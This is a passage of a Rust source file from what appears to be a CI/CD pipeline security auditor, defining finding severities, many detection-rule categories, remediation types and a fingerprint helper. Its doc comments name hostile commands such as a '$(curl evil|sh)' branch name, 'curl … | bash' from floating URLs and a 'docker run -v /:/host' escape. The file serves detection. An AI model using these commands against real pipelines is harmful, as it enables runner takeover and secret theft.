// taudit_core/finding.rs
1use crate::graph::{AuthorityGraph, NodeId, NodeKind};
2use crate::propagation::PropagationPath;
3use serde::{Deserialize, Serialize};
4use sha2::{Digest, Sha256};
5use std::path::PathBuf;
6
7// ── Finding-output enhancements (v0.10) ────────────────────────────
8//
9// The blue-team corpus defense report (Section 3) recommends a small
10// set of additive `Finding` fields that consumers (SIEMs, dashboards,
11// triage queues) need but cannot derive cheaply. They are:
12//
13// * `finding_group_id` — stable UUID v5 over (namespace, fingerprint)
14// so N hops against one secret cluster into
15// a single advisory in downstream tooling.
16// * `time_to_fix` — coarse remediation effort enum so triage
17// dashboards can sort by severity * effort.
18// * `compensating_controls` — human-readable list of detected controls
19// that downgraded the finding's severity.
20// * `suppressed` — set by the `.taudit-suppressions.yml`
21// applicator; preserves audit trail when a
22// finding has been waived rather than fixed.
23// * `original_severity` — pre-downgrade severity; populated whenever
24// the suppression applicator OR a compensating
25// control modifies `severity`.
26// * `suppression_reason` — operator-supplied justification from the
27// matching `.taudit-suppressions.yml` entry.
28//
29// All six fields live on `FindingExtras` and are flattened into JSON / SARIF
30// output via `#[serde(flatten)]`. New rules can populate them via
31// `Finding::with_time_to_fix(...)` / `Finding::with_compensating_controls(...)`
32// without touching the 31+ existing rule sites.
33
/// Finding severity. Declared most-severe-first; the manual `Ord` impl
/// below ranks `Critical` lowest, so an ascending sort lists the most
/// severe findings first. Serialises as snake_case strings
/// (`"critical"`, `"high"`, …).
#[derive(Debug, Clone, Copy, PartialEq, Eq, Hash, Serialize, Deserialize)]
#[serde(rename_all = "snake_case")]
pub enum Severity {
    Critical,
    High,
    Medium,
    Low,
    Info,
}
43
44impl Severity {
45 fn rank(self) -> u8 {
46 match self {
47 Severity::Critical => 0,
48 Severity::High => 1,
49 Severity::Medium => 2,
50 Severity::Low => 3,
51 Severity::Info => 4,
52 }
53 }
54}
55
56impl Ord for Severity {
57 fn cmp(&self, other: &Self) -> std::cmp::Ordering {
58 self.rank().cmp(&other.rank())
59 }
60}
61
62impl PartialOrd for Severity {
63 fn partial_cmp(&self, other: &Self) -> Option<std::cmp::Ordering> {
64 Some(self.cmp(other))
65 }
66}
67
/// Finding categories. The original MVP set (the first five variants) is
/// derivable from pipeline YAML alone; the stretch categories that follow
/// need heuristics or metadata enrichment. (The old "(1-5)" / "(6-9)"
/// numbering predates the enum's growth and no longer matches.) Two
/// reserved variants at the end need enrichment beyond pipeline YAML and
/// are `#[doc(hidden)]`.
#[derive(Debug, Clone, Copy, PartialEq, Eq, Hash, Serialize, Deserialize)]
#[serde(rename_all = "snake_case")]
pub enum FindingCategory {
    // MVP — individually undocumented; variant names mirror their snake_case
    // rule ids (see `category_rule_id`). Consult the emitting rules for
    // precise semantics.
    AuthorityPropagation,
    OverPrivilegedIdentity,
    UnpinnedAction,
    UntrustedWithAuthority,
    ArtifactBoundaryCrossing,
    // Stretch — implemented. The first two are undocumented here; their
    // names mirror their rule ids like the MVP set above.
    FloatingImage,
    LongLivedCredential,
    /// Credential written to disk by a step (e.g. `persistCredentials: true` on a checkout).
    /// Disk-persisted credentials are accessible to all subsequent steps and any process
    /// with filesystem access, unlike runtime-only `HasAccessTo` authority.
    PersistedCredential,
    /// Dangerous trigger type (pull_request_target / pr) combined with secret/identity access.
    TriggerContextMismatch,
    /// Authority (secret/identity) flows into an opaque external workflow via DelegatesTo.
    CrossWorkflowAuthorityChain,
    /// Circular DelegatesTo chain — workflow calls itself transitively.
    AuthorityCycle,
    /// Privileged workflow (OIDC/broad identity) with no provenance attestation step.
    UpliftWithoutAttestation,
    /// Step writes to the environment gate ($GITHUB_ENV, pipeline variables) — authority can propagate.
    SelfMutatingPipeline,
    /// PR-triggered pipeline checks out the repository — attacker-controlled fork code lands on the runner.
    CheckoutSelfPrExposure,
    /// ADO variable group consumed by a PR-triggered job, crossing trust boundary.
    VariableGroupInPrJob,
    /// Self-hosted agent pool used in a PR-triggered job that also checks out the repository.
    SelfHostedPoolPrHijack,
    /// Broad-scope ADO service connection reachable from a PR-triggered job without OIDC.
    ServiceConnectionScopeMismatch,
    /// ADO `resources.repositories[]` entry referenced by an `extends:`,
    /// `template: x@alias`, or `checkout: alias` consumer resolves with no
    /// `ref:` (default branch) or a mutable branch ref (`refs/heads/<name>`).
    /// Whoever owns that branch can inject steps into the consuming pipeline.
    TemplateExtendsUnpinnedBranch,
    /// ADO `resources.repositories[]` entry pinned to a feature-class branch
    /// (anything outside the `main` / `master` / `release/*` / `hotfix/*`
    /// platform set). Feature branches typically have weaker push protection
    /// than the trunk, so any developer with write access to that branch can
    /// inject pipeline YAML that runs with the consumer's authority. Strictly
    /// stronger signal than `template_extends_unpinned_branch` — co-fires.
    TemplateRepoRefIsFeatureBranch,
    /// Pipeline step uses an Azure VM remote-exec primitive (Set-AzVMExtension /
    /// CustomScriptExtension, Invoke-AzVMRunCommand, az vm run-command, az vm extension set)
    /// where the executed command line interpolates a pipeline secret or a SAS token —
    /// pipeline-to-VM lateral movement primitive logged in plaintext to the VM and ARM.
    VmRemoteExecViaPipelineSecret,
    /// A SAS token freshly minted in-pipeline is interpolated into a CLI argument
    /// (commandToExecute / scriptArguments / --arguments / -ArgumentList) instead of
    /// passed via env var or stdin — argv ends up in /proc/*/cmdline, ETW, ARM status.
    ShortLivedSasInCommandLine,
    /// Pipeline secret value assigned to a shell variable inside an inline
    /// script (`export VAR=$(SECRET)`, `$X = "$(SECRET)"`). Once the value
    /// transits a shell variable, ADO's `$(SECRET)` log mask no longer
    /// applies — transcripts (`Start-Transcript`, `bash -x`, terraform debug
    /// logs) print the cleartext.
    SecretToInlineScriptEnvExport,
    /// Pipeline secret value written to a file under the agent workspace
    /// (`$(System.DefaultWorkingDirectory)`, `$(Build.SourcesDirectory)`,
    /// or relative paths) without `secureFile` task or chmod 600. The file
    /// persists in the agent workspace and is uploaded by
    /// `PublishPipelineArtifact` and crawlable by later steps.
    SecretMaterialisedToWorkspaceFile,
    /// PowerShell pulls a Key Vault secret with `-AsPlainText` (or
    /// `ConvertFrom-SecureString -AsPlainText`, or older
    /// `.SecretValueText` syntax) into a non-`SecureString` variable. The
    /// value never traverses the ADO variable-group boundary, so verbose
    /// Az/PS logging and error stack traces print the credential.
    ///
    /// Rule id is `keyvault_secret_to_plaintext` (single token "keyvault")
    /// rather than the snake_case derivation `key_vault_…` — matches the
    /// docs filename and the convention used in the corpus evidence.
    #[serde(rename = "keyvault_secret_to_plaintext")]
    KeyVaultSecretToPlaintext,
    /// `terraform apply -auto-approve` against a production-named service connection
    /// without an environment approval gate.
    TerraformAutoApproveInProd,
    /// `AzureCLI@2` task with `addSpnToEnvironment: true` AND an inline script —
    /// the script can launder federated SPN/OIDC tokens into pipeline variables.
    AddSpnWithInlineScript,
    /// A `type: string` pipeline parameter (no `values:` allowlist) is interpolated
    /// via `${{ parameters.X }}` into an inline shell/PowerShell script body —
    /// shell injection vector for anyone with "queue build".
    ParameterInterpolationIntoShell,
    /// A `run:` block fetches a remote script from a mutable URL (`refs/heads/`,
    /// `/main/`, `/master/`) and pipes it directly to a shell interpreter
    /// (`curl … | bash`, `wget … | sh`, `bash <(curl …)`, `deno run https://…`).
    /// Whoever controls that URL's content controls execution on the runner.
    RuntimeScriptFetchedFromFloatingUrl,
    /// Workflow trigger combines high-authority PR events
    /// (`pull_request_target`, `issue_comment`, or `workflow_run`) with a step
    /// whose `uses:` ref is a mutable branch/tag (not a 40-char SHA). Compromise
    /// of the action's default branch yields full repo write on the target repo.
    PrTriggerWithFloatingActionRef,
    /// A `workflow_run`-triggered workflow captures a value from an external
    /// API response (`gh pr view`, `gh api`, `curl api.github.com`) and writes
    /// it into `$GITHUB_ENV`/`$GITHUB_OUTPUT`/`$GITHUB_PATH` without sanitisation.
    /// A poisoned API field (branch name, title) injects environment variables
    /// into every subsequent step in the same job.
    UntrustedApiResponseToEnvSink,
    /// A `pull_request`-triggered workflow logs into a container registry via a
    /// floating (non-SHA-pinned) login action. The compromised action receives
    /// OIDC tokens or registry credentials, and the workflow then pushes a
    /// PR-controlled image to a shared registry.
    PrBuildPushesImageWithFloatingCredentials,
    /// First-party step writes a Secret/Identity-derived value into the
    /// `$GITHUB_ENV` gate (or pipeline-variable equivalent) and a *later*
    /// step in the same job that runs in `Untrusted` or `ThirdParty` trust
    /// zone reads from the runner-managed env (`${{ env.X }}`). The two
    /// component rules — `self_mutating_pipeline` (writer) and
    /// `untrusted_with_authority` (consumer) — each see only half the
    /// chain and emit no finding for the laundered consumer; this rule
    /// closes the composition gap that R2 attack #3 exploited.
    SecretViaEnvGateToUntrustedConsumer,
    /// Positive-invariant rule (GHA): the workflow declares neither a
    /// top-level nor a per-job `permissions:` block, leaving GITHUB_TOKEN at
    /// its broad platform default. Fires once per workflow file.
    NoWorkflowLevelPermissionsBlock,
    /// Positive-invariant rule (ADO): a job referencing a production-named
    /// service connection has no `environment:` binding, so it bypasses the
    /// only ADO-side approval gate regardless of whether `-auto-approve` is
    /// present. Strictly broader than `terraform_auto_approve_in_prod`.
    ProdDeployJobNoEnvironmentGate,
    /// Positive-invariant rule (cross-platform): a long-lived static
    /// credential is in scope but the workflow does not currently use any
    /// OIDC identity even though the target cloud supports federation.
    /// Advisory uplift on top of `long_lived_credential` that wires the
    /// existing `Recommendation::FederateIdentity` variant.
    LongLivedSecretWithoutOidcRecommendation,
    /// Positive-invariant rule (GHA): a PR-triggered workflow has multiple
    /// privileged jobs where SOME have the standard fork-check `if:` and
    /// OTHERS do not. Detects an intra-file inconsistency in defensive
    /// posture — the org has the right instinct but applied it unevenly.
    PullRequestWorkflowInconsistentForkCheck,
    /// Positive-invariant rule (GitLab): a job with a production-named
    /// `environment:` binding has no `rules:` / `only:` clause restricting
    /// it to protected branches. Deploy job runs (or attempts to run) on
    /// every pipeline trigger.
    GitlabDeployJobMissingProtectedBranchOnly,
    /// Two-step ADO chain: an inline script captures a `terraform output`
    /// value (literal `terraform output` CLI invocation or a `$env:TF_OUT_*` /
    /// `$TF_OUT_*` env var sourced from a Terraform CLI task) AND emits a
    /// `##vso[task.setvariable variable=X;...]` directive setting that
    /// captured value into pipeline variable `X`. A subsequent step in the
    /// same job then expands `$(X)` in shell-expansion position
    /// (`bash -c "..."`, `eval`, command substitution `$(...)`, PowerShell
    /// `-split` / `Invoke-Command` / `Invoke-Expression`/`iex`, or as an
    /// unquoted command word). The `task.setvariable` hop launders
    /// attacker-controlled Terraform state — sourced from a remote backend
    /// (S3 bucket, Azure Storage) that often has weaker access controls than
    /// the pipeline itself — through pipeline-variable space and into a
    /// shell interpreter.
    TerraformOutputViaSetvariableShellExpansion,
    /// GHA workflow declares a high-blast-radius trigger (`issue_comment`,
    /// `pull_request_review`, `pull_request_review_comment`, `workflow_run`)
    /// alongside write permissions or non-`GITHUB_TOKEN` secrets. Closes the
    /// gap left by `trigger_context_mismatch` only firing on
    /// `pull_request_target` / ADO `pr`.
    RiskyTriggerWithAuthority,
    /// A `jobs.<id>.outputs.<name>` value is sourced from `secrets.*`, an
    /// OIDC-bearing step output, or has a credential-shaped name. Job outputs
    /// flow unmasked through `needs.<job>.outputs.*` and are written to the
    /// run log — masking is heuristic, never authoritative.
    SensitiveValueInJobOutput,
    /// A `workflow_dispatch.inputs.*` value flows into `curl` / `wget` /
    /// `gh api` / a `run:` URL / `actions/checkout` `ref:`. Anyone with
    /// dispatch permission can pivot the run to attacker-controlled refs or
    /// hosts.
    ManualDispatchInputToUrlOrCommand,
    /// A reusable workflow call uses `secrets: inherit` while the caller is
    /// triggered by an attacker-influenced event (`pull_request`,
    /// `pull_request_target`, `issue_comment`, `workflow_run`). The whole
    /// caller secret bag forwards to the callee regardless of what the callee
    /// actually consumes — every transitive `uses:` in the called workflow
    /// inherits the same scope.
    SecretsInheritOverscopedPassthrough,
    /// A `workflow_run`- or `pull_request_target`-triggered consumer
    /// downloads an artifact from the originating run AND interprets that
    /// artifact's content into a privileged sink (post-to-comment, write to
    /// `$GITHUB_ENV`, `eval`, …). The producer ran in PR context, so a
    /// malicious PR can write arbitrary content into the artifact while the
    /// consumer holds upstream-repo authority.
    UnsafePrArtifactInWorkflowRunConsumer,
    /// A GitHub Actions `run:` block (or `actions/github-script` `script:` body)
    /// interpolates an attacker-controllable expression — `${{ github.event.* }}`,
    /// `${{ github.head_ref }}`, or `${{ inputs.* }}` from a privileged trigger
    /// (`workflow_dispatch` / `workflow_run` / `issue_comment`) — directly into
    /// the script text without first binding through an `env:` indirection.
    /// Classic GitHub Actions remote-code-execution pattern.
    ScriptInjectionViaUntrustedContext,
    /// A workflow that holds non-`GITHUB_TOKEN` secrets or non-default
    /// write permissions includes a step that uses an interactive debug action
    /// (mxschmitt/action-tmate, lhotari/action-upterm, actions/tmate, …).
    /// A maintainer flipping `debug_enabled=true` publishes the runner's full
    /// environment over an external SSH endpoint.
    InteractiveDebugActionInAuthorityWorkflow,
    /// An `actions/cache` step keys the cache on a PR-derived expression
    /// (`github.head_ref`, `github.event.pull_request.head.ref`, `github.actor`)
    /// in a workflow that ALSO runs on `push: branches: [main]` — a PR can
    /// poison the cache that the default-branch build later restores.
    PrSpecificCacheKeyInDefaultBranchConsumer,
    /// A `run:` step uses `gh ` / `gh api` with the default `GITHUB_TOKEN` to
    /// perform a write-class action (`pr merge`, `release create/upload`,
    /// `api -X POST/PATCH/PUT/DELETE` to `/repos/.../{contents,releases,actions/secrets,environments}`)
    /// inside a workflow triggered by `pull_request`, `issue_comment`, or
    /// `workflow_run` — runtime privilege escalation that static permission
    /// checks miss.
    GhCliWithDefaultTokenEscalating,
    /// GitLab CI `$CI_JOB_TOKEN` (or `gitlab-ci-token:$CI_JOB_TOKEN`) used as a
    /// bearer credential against an external HTTP API or fed to `docker login`
    /// for `registry.gitlab.com`. CI_JOB_TOKEN's default scope (registry write,
    /// package upload, project read) means a poisoned MR job that emits the
    /// token to a webhook can pivot to package/registry pushes elsewhere.
    CiJobTokenToExternalApi,
    /// GitLab CI `id_tokens:` declares an `aud:` audience that is reused across
    /// MR-context and protected-context jobs (no audience separation), or is a
    /// wildcard / multi-cloud broker URL. The audience is what trades for
    /// downstream cloud creds — a single shared `aud` means any job that
    /// compromises the token assumes the most-privileged role any other job
    /// uses.
    IdTokenAudienceOverscoped,
    /// Direct shell interpolation of attacker-controlled GitLab predefined
    /// vars (`$CI_COMMIT_BRANCH`, `$CI_COMMIT_REF_NAME`, `$CI_COMMIT_TAG`,
    /// `$CI_COMMIT_MESSAGE`, `$CI_COMMIT_TITLE`, `$CI_MERGE_REQUEST_TITLE`,
    /// `$CI_MERGE_REQUEST_DESCRIPTION`,
    /// `$CI_MERGE_REQUEST_SOURCE_BRANCH_NAME`, `$CI_COMMIT_AUTHOR`) into
    /// `script:` / `before_script:` / `after_script:` / `environment:url:`
    /// without single-quote isolation. A branch named `` $(curl evil|sh) ``
    /// executes inside the runner. GitLab generalisation of the GHA
    /// `script_injection_via_untrusted_context` class.
    UntrustedCiVarInShellInterpolation,
    /// A GitLab `include:` references (a) a `remote:` URL pointing at a
    /// branch (`/-/raw/<branch>/...`), (b) a `project:` with `ref:` resolving
    /// to a mutable branch name (main/master/develop), or (c) an include with
    /// no `ref:` at all (defaults to HEAD). Whoever owns that branch can
    /// backdoor every consumer's pipeline silently — included YAML executes
    /// with the consumer's secrets and CI_JOB_TOKEN.
    UnpinnedIncludeRemoteOrBranchRef,
    /// A GitLab job declares a `services: [docker:*-dind]` sidecar AND holds
    /// at least one non-CI_JOB_TOKEN secret (registry creds, deploy keys,
    /// signing keys, vault id_tokens). docker-in-docker exposes the full
    /// Docker socket inside the job container — a malicious build step can
    /// `docker run -v /:/host` from inside dind and read the runner host
    /// filesystem (other jobs' artifacts, cached creds).
    DindServiceGrantsHostAuthority,
    /// A GitLab job whose name or `extends:` matches scanner patterns
    /// (`sast`, `dast`, `secret_detection`, `dependency_scanning`,
    /// `container_scanning`, `gitleaks`, `trivy`, `grype`, `semgrep`, etc.)
    /// runs with `allow_failure: true` AND has no `rules:` clause that
    /// surfaces the failure. The pipeline goes green even when the scan
    /// errors out — silent-pass is worse than no scan because reviewers trust
    /// the badge.
    SecurityJobSilentlySkipped,
    /// A GitLab `trigger:` job (downstream / child pipeline) runs in
    /// `merge_request_event` context OR uses `include: artifact:` from a
    /// previous job (dynamic child pipeline). Dynamic child pipelines are a
    /// code-injection sink — anything the build step writes to the artifact
    /// runs as a real pipeline with the parent project's secrets.
    ChildPipelineTriggerInheritsAuthority,
    /// A GitLab `cache:` declaration whose `key:` is hardcoded, `$CI_JOB_NAME`
    /// only, or `$CI_COMMIT_REF_SLUG` without a `policy: pull` restriction.
    /// Caches are stored per-runner keyed by `key:`; a poisoned MR can push a
    /// malicious `node_modules/` cache that the next default-branch job
    /// downloads and executes during `npm install`.
    CacheKeyCrossesTrustBoundary,
    /// A CI script constructs an HTTPS git URL with embedded credentials
    /// (`https://user:$TOKEN@host/...`) before invoking `git clone`,
    /// `git push`, or `git remote set-url`. The credential is exposed
    /// in the process argv (visible to `ps`, `/proc/*/cmdline`), persists
    /// in `.git/config` for the rest of the job, and may be uploaded as
    /// part of any artifact that bundles the workspace.
    PatEmbeddedInGitRemoteUrl,
    /// A CI job triggers a different project's pipeline via the GitLab
    /// REST API using `CI_JOB_TOKEN` and forwards user-influenced variables
    /// through the `variables[KEY]=value` query/form parameter. The
    /// downstream project's security depends on the trust contract between
    /// the two projects — variable values flowing across that boundary
    /// constitute a cross-project authority bridge.
    CiTokenTriggersDownstreamWithVariablePassthrough,
    /// A GitLab job emits an `artifacts.reports.dotenv: <file>` artifact
    /// whose contents become pipeline variables for any consumer linked
    /// via `needs:` or `dependencies:`. A consumer in a later stage that
    /// targets a production-named environment inherits those variables
    /// transparently — no explicit download is visible at the job level.
    /// When the producer reads attacker-influenced inputs (branch names,
    /// commit messages), the dotenv flow is a covert privilege escalation
    /// channel into the deployment job.
    DotenvArtifactFlowsToPrivilegedDeployment,
    // Reserved — requires ADO/GH API enrichment beyond pipeline YAML
    /// Requires runtime network telemetry or policy enrichment — not detectable from YAML alone.
    #[doc(hidden)]
    EgressBlindspot,
    /// Requires external audit-sink configuration data — not detectable from YAML alone.
    #[doc(hidden)]
    MissingAuditTrail,
}
370
/// Routing: scope findings -> TsafeRemediation; isolation findings -> CellosRemediation.
/// Internally tagged in JSON as `{"type": "<snake_case variant>", ...fields}`.
#[derive(Debug, Clone, Serialize, Deserialize)]
#[serde(tag = "type", rename_all = "snake_case")]
pub enum Recommendation {
    /// Scope remediation: a concrete `command` to run plus an
    /// `explanation` of what it changes.
    TsafeRemediation {
        command: String,
        explanation: String,
    },
    /// Isolation remediation: the `reason` isolation is needed and a
    /// `spec_hint` for the isolation spec.
    CellosRemediation {
        reason: String,
        spec_hint: String,
    },
    /// Replace a floating reference (`current`) with an immutable one (`pinned`).
    PinAction {
        current: String,
        pinned: String,
    },
    /// Shrink a permission grant from `current` to the suggested `minimum`.
    ReducePermissions {
        current: String,
        minimum: String,
    },
    /// Replace a long-lived `static_secret` with OIDC federation against
    /// `oidc_provider`. Wired by `long_lived_secret_without_oidc_recommendation`.
    FederateIdentity {
        static_secret: String,
        oidc_provider: String,
    },
    /// Free-form remediation text when no structured variant fits.
    Manual {
        action: String,
    },
}
399
/// Provenance of a finding — distinguishes findings emitted by built-in
/// taudit rules from findings emitted by user-loaded custom invariant YAML
/// (`--invariants-dir`). Custom rules can emit arbitrarily-worded findings
/// at any severity, so an operator piping output into a JIRA workflow or
/// SARIF upload needs a non-spoofable signal of which file the rule came
/// from. Serializes as `"built-in"` (string) for built-in findings.
///
/// NOTE(review): as declared, serde's externally-tagged representation of
/// the `Custom` struct variant serializes as
/// `{"custom": {"source_file": "<path>"}}`; the `{"custom": "<path>"}`
/// shape described in `docs/finding-fingerprint.md` would require a
/// newtype variant `Custom(PathBuf)` — confirm which form the schema and
/// consumers actually expect.
#[derive(Debug, Clone, Default, PartialEq, Eq, Serialize, Deserialize)]
#[serde(rename_all = "snake_case")]
pub enum FindingSource {
    /// Emitted by a built-in rule defined in `taudit-core::rules`. The
    /// authoritative trust anchor — the binary's release commit defines the
    /// rule logic. Serialises as the kebab-case string `"built-in"` to match
    /// `schemas/finding.v1.json`.
    #[default]
    #[serde(rename = "built-in")]
    BuiltIn,
    /// Emitted by a custom invariant rule loaded from the given YAML file.
    /// The path is the file the rule was loaded from, retained so operators
    /// can audit which file produced any given finding.
    Custom { source_file: PathBuf },
}
423
424impl FindingSource {
425 /// True for findings emitted by built-in rules.
426 pub fn is_built_in(&self) -> bool {
427 matches!(self, FindingSource::BuiltIn)
428 }
429}
430
/// Coarse-grained remediation effort. Surfaces in JSON `time_to_fix` and SARIF
/// `properties.timeToFix` so triage dashboards can sort by `severity * effort`.
/// Serialises as snake_case strings (`"trivial"` … `"large"`).
///
/// The four buckets are deliberately wide. Precise time estimates would invite
/// argument; the buckets exist to separate "flip a flag" from "rewrite a job"
/// from "renegotiate ops policy".
///
/// Per `MEMORY/.../blueteam-corpus-defense.md` Section 3 / Enhancement E-3.
#[derive(Debug, Clone, Copy, PartialEq, Eq, Serialize, Deserialize)]
#[serde(rename_all = "snake_case")]
pub enum FixEffort {
    /// ~5 minutes. Mechanical change to a single file (flip a flag, pin a SHA,
    /// add a `permissions: {}` block). No structural risk.
    Trivial,
    /// ~1 hour. Refactor a step or job: split a script, add a fork-check,
    /// move a secret to an environment binding.
    Small,
    /// ~1 day. Restructure a job or pipeline: introduce an environment gate,
    /// move from inline scripts to a sandboxed action, add an OIDC role.
    Medium,
    /// ~1 week or more. Operational policy change: migrate from PATs to OIDC
    /// across an org, change branch protection model, retire a service principal.
    Large,
}
455
/// Optional finding metadata. Lives on every `Finding` via
/// `#[serde(flatten)]` so consumers see the fields at the top of the
/// finding object — same place they'd appear if declared inline on
/// `Finding`. Default-constructed extras serialize to nothing (all
/// `Option::None` and empty `Vec`s skip-serialize, and `suppressed:
/// false` is skipped via `is_false`), so existing snapshots remain
/// byte-stable until a rule populates a field.
///
/// **Why a wrapper struct?** The 30+ rule call sites use struct
/// literal syntax. Adding fields directly to `Finding` would force
/// every site to edit. With `extras: FindingExtras::default()`, new
/// extras can be added in a single place.
#[derive(Debug, Clone, Default, Serialize, Deserialize)]
pub struct FindingExtras {
    /// Stable UUID v5 over `(NAMESPACE, fingerprint)` — collapses
    /// per-hop findings against the same authority root into one group
    /// for SIEM display. See `compute_finding_group_id`.
    #[serde(default, skip_serializing_if = "Option::is_none")]
    pub finding_group_id: Option<String>,

    /// Coarse remediation effort. See `FixEffort`. Set via
    /// `Finding::with_time_to_fix`.
    #[serde(default, skip_serializing_if = "Option::is_none")]
    pub time_to_fix: Option<FixEffort>,

    /// Human-readable list of controls that already neutralise (or partially
    /// neutralise) this finding — populated when a compensating-control
    /// detector downgrades severity (see `Finding::with_compensating_control`).
    /// Empty when no downgrade applied.
    #[serde(default, skip_serializing_if = "Vec::is_empty")]
    pub compensating_controls: Vec<String>,

    /// Set to `true` by the suppression applicator when a matching
    /// `.taudit-suppressions.yml` entry exists AND the configured mode
    /// is `Suppress`. The finding still appears in output (audit trail
    /// preserved) but consumers can filter on this field.
    #[serde(default, skip_serializing_if = "is_false")]
    pub suppressed: bool,

    /// Original pre-downgrade severity. Populated by the suppression
    /// applicator OR a compensating-control detector when `severity`
    /// is mutated. `None` means the current severity is the rule-emitted
    /// value.
    #[serde(default, skip_serializing_if = "Option::is_none")]
    pub original_severity: Option<Severity>,

    /// Operator-supplied justification from the matching suppression
    /// entry. `None` when no suppression applies.
    #[serde(default, skip_serializing_if = "Option::is_none")]
    pub suppression_reason: Option<String>,
}
504
/// Serde `skip_serializing_if` predicate for `FindingExtras::suppressed` —
/// keeps the default `false` out of serialized output. The `&bool`
/// signature is dictated by serde's calling convention, hence the allow.
#[allow(clippy::trivially_copy_pass_by_ref)]
fn is_false(b: &bool) -> bool {
    // `Not` is implemented for `&bool`, so no explicit deref is needed.
    !b
}
509
/// A finding is a concrete, actionable authority issue.
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct Finding {
    /// Triage severity. May be lower than the rule-emitted value after a
    /// compensating-control or suppression downgrade — see
    /// `extras.original_severity`.
    pub severity: Severity,
    /// Rule category; also the default source of the snake_case rule id
    /// (see `rule_id_for` / `category_rule_id`).
    pub category: FindingCategory,
    /// Authority-propagation path backing the finding, when the emitting
    /// rule derived one. Omitted from JSON when `None`.
    #[serde(skip_serializing_if = "Option::is_none")]
    pub path: Option<PropagationPath>,
    /// Graph nodes implicated in this finding.
    pub nodes_involved: Vec<NodeId>,
    /// Human-readable description. Custom-rule findings carry a bracketed
    /// rule-id prefix (`[my_rule] …`) that `extract_custom_rule_id` parses.
    pub message: String,
    /// Suggested remediation — see `Recommendation` for routing.
    pub recommendation: Recommendation,
    /// Provenance of this finding. Defaults to `BuiltIn` for backward
    /// compatibility with code/JSON that predates the field — every
    /// in-tree built-in rule sets this explicitly. Deserialization of older
    /// JSON without the field treats the finding as built-in.
    #[serde(default)]
    pub source: FindingSource,
    /// Optional metadata (group id, time-to-fix, compensating controls,
    /// suppression markers). Flattens into the JSON object so consumers
    /// see top-level fields — see `FindingExtras` for individual semantics.
    #[serde(flatten, default)]
    pub extras: FindingExtras,
}
532
533impl Finding {
534 /// Builder helper: attach a `time_to_fix` annotation to this finding.
535 /// Call sites: `let f = Finding { ... }.with_time_to_fix(FixEffort::Trivial);`
536 pub fn with_time_to_fix(mut self, effort: FixEffort) -> Self {
537 self.extras.time_to_fix = Some(effort);
538 self
539 }
540
541 /// Builder helper: append a compensating control description and
542 /// downgrade severity by one tier (Critical -> High -> Medium -> Low -> Info).
543 /// Records the original severity so the audit trail survives.
544 pub fn with_compensating_control(mut self, control: impl Into<String>) -> Self {
545 let original = self.severity;
546 self.extras.compensating_controls.push(control.into());
547 self.severity = downgrade_severity(self.severity);
548 if self.extras.original_severity.is_none() {
549 self.extras.original_severity = Some(original);
550 }
551 self
552 }
553}
554
555/// Move severity one rank toward `Info` (Critical -> High -> ... -> Info).
556/// `Info` stays `Info`. Used by both the suppression applicator and
557/// compensating-control detectors.
558pub fn downgrade_severity(s: Severity) -> Severity {
559 match s {
560 Severity::Critical => Severity::High,
561 Severity::High => Severity::Medium,
562 Severity::Medium => Severity::Low,
563 Severity::Low => Severity::Info,
564 Severity::Info => Severity::Info,
565 }
566}
567
568/// Stable UUID v5 over the finding fingerprint. Two findings whose
569/// fingerprints match (same rule + file + root authority) produce the
570/// same `finding_group_id` — that is the whole point: SIEMs and triage
571/// dashboards collapse N hops against a single secret into one row.
572///
573/// The UUID v5 namespace is a fixed UUID v4 derived once and embedded
574/// here. Treating the namespace as load-bearing is intentional: any
575/// future change here would break every consumer that has stored a
576/// `finding_group_id`. Bump only at a major version.
577pub fn compute_finding_group_id(fingerprint: &str) -> String {
578 // UUID v5 = SHA-1(namespace || name), with version + variant bits set.
579 // Implemented inline so taudit-core stays free of the `uuid` crate
580 // dependency (workspace already depends on it from the CLI; core
581 // remains zero-IO and minimal).
582 const NAMESPACE: [u8; 16] = [
583 0x6c, 0x6f, 0xd0, 0xa3, 0x82, 0x44, 0x4f, 0x29, 0xb1, 0x9a, 0x09, 0xc8, 0x7e, 0x49, 0x55,
584 0x21,
585 ];
586
587 use sha1::{Digest as Sha1Digest, Sha1};
588 let mut hasher = Sha1::new();
589 Sha1Digest::update(&mut hasher, NAMESPACE);
590 Sha1Digest::update(&mut hasher, fingerprint.as_bytes());
591 let hash = hasher.finalize();
592
593 let mut bytes = [0u8; 16];
594 bytes.copy_from_slice(&hash[..16]);
595 // RFC 4122 §4.3: set version to 5 (bits 12-15 of time_hi_and_version)
596 bytes[6] = (bytes[6] & 0x0f) | 0x50;
597 // RFC 4122 §4.4: set variant to RFC 4122 (bits 6-7 of clock_seq_hi)
598 bytes[8] = (bytes[8] & 0x3f) | 0x80;
599
600 format!(
601 "{:02x}{:02x}{:02x}{:02x}-{:02x}{:02x}-{:02x}{:02x}-{:02x}{:02x}-{:02x}{:02x}{:02x}{:02x}{:02x}{:02x}",
602 bytes[0], bytes[1], bytes[2], bytes[3],
603 bytes[4], bytes[5],
604 bytes[6], bytes[7],
605 bytes[8], bytes[9],
606 bytes[10], bytes[11], bytes[12], bytes[13], bytes[14], bytes[15],
607 )
608}
609
610// ── Finding fingerprint ────────────────────────────────────
611//
612// Stable cross-run identifier for a finding. Surfaces in:
613//
614// * SARIF `partialFingerprints[primaryLocationLineHash]`
615// * JSON `findings[].fingerprint`
616// * CloudEvents extension attribute `tauditfindingfingerprint`
617//
618// SIEMs / suppression DBs / dedup pipelines key on this value to
619// recognise "same finding seen on previous run". See
620// `docs/finding-fingerprint.md` for the full contract.
621
/// Pull a custom-rule id out of a finding message of the form
/// `[<id>] rest of message`.
///
/// Returns `None` when the message has no leading `[`, no closing `]`, or
/// an empty id (`[]`). Mirrors the matching helper in
/// `taudit-report-sarif`; kept private so the surface stays minimal.
fn extract_custom_rule_id(message: &str) -> Option<&str> {
    let after_bracket = message.strip_prefix('[')?;
    let close = after_bracket.find(']')?;
    let id = &after_bracket[..close];
    (!id.is_empty()).then_some(id)
}
638
639/// Snake-case rule id derived from a `FindingCategory`. Delegates to
640/// serde so the value tracks the serialized form across renames.
641fn category_rule_id(category: &FindingCategory) -> String {
642 serde_json::to_value(category)
643 .ok()
644 .and_then(|v| v.as_str().map(str::to_string))
645 .unwrap_or_else(|| "unknown".to_string())
646}
647
648/// Public, stable rule-id resolver for a finding.
649///
650/// Returns the snake_case rule id reported alongside this finding. When the
651/// finding's message starts with a bracketed custom-rule prefix
652/// (`[my_rule] ...`), the bracketed id wins so custom YAML rules surface
653/// their declared id. Otherwise the rule id is the snake_case form of the
